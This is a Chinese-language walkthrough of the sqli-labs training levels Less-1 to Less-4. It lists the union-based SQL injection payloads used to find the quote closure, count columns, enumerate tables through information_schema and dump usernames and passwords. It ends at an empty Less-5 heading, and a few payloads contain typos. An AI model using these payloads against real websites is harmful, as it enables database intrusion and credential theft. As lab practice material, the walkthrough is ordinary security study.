LESS1
判断闭合符号,输入
?id=1'
根据报错信息( right syntax to use near ''1'' LIMIT 0,1' at line 1)判断大概闭合符号为' 再输入?id=1验证
猜测列名数
?id=1' and order by 3 --+
?id=1' and order by 4 --+ 说明列名数为3
接下来进行联合查询
?id=-1' union select 1,2,3--+(输入-1是因为如果联合查询时先进行前面的查询如果数据库里面有就会进行输出虽然后面也会被查询但是不会输出)
利用相同方法查询数据库?id=-1' union select 1,2,database() --+
爆破表名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ 出现四个表面
查询一下USERS表?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ 信息太多尝试缩小范围
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+ 感觉很近了
?id=-1' union select 1,2,group_concat(username,0x3B,password) from users--+
#0x3B是;的十六进制码
LESS2
与第一关类似的就不赘述了
利用?id=1 和 ?id=1'
?id=-1 union select 1,2,3--+
利用?id=-1%20union%20select%201,database()查看表名
爆破表和列
?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema_table='secrity'
?id=-1%20union%20select%201,2,group_concat(username,0x7e,password)%20from%20users--+
LESS-3
?id=1' and 1=1
判断字段数和回显位置
?id=1') order by 3--+
?id=-1') union select 1,2,3--+
爆破库,表
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
爆列,爆数据
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+
?id=-1') union select 1,2,group_concat(username,0x7e,password) from users--+
Less-4
判断闭合符号
?id=1\
这关的sql语句闭合有双引号
回显数
?id=1") order by 3 --+
?id=-1") union select 1,2,3--+
爆库,表
?id=-1") union select 1,2,database()--+
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
爆字段 数据
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+
?id=-1") union select 1,2,group_concat(username,0x7e,password) from users--+
Less-5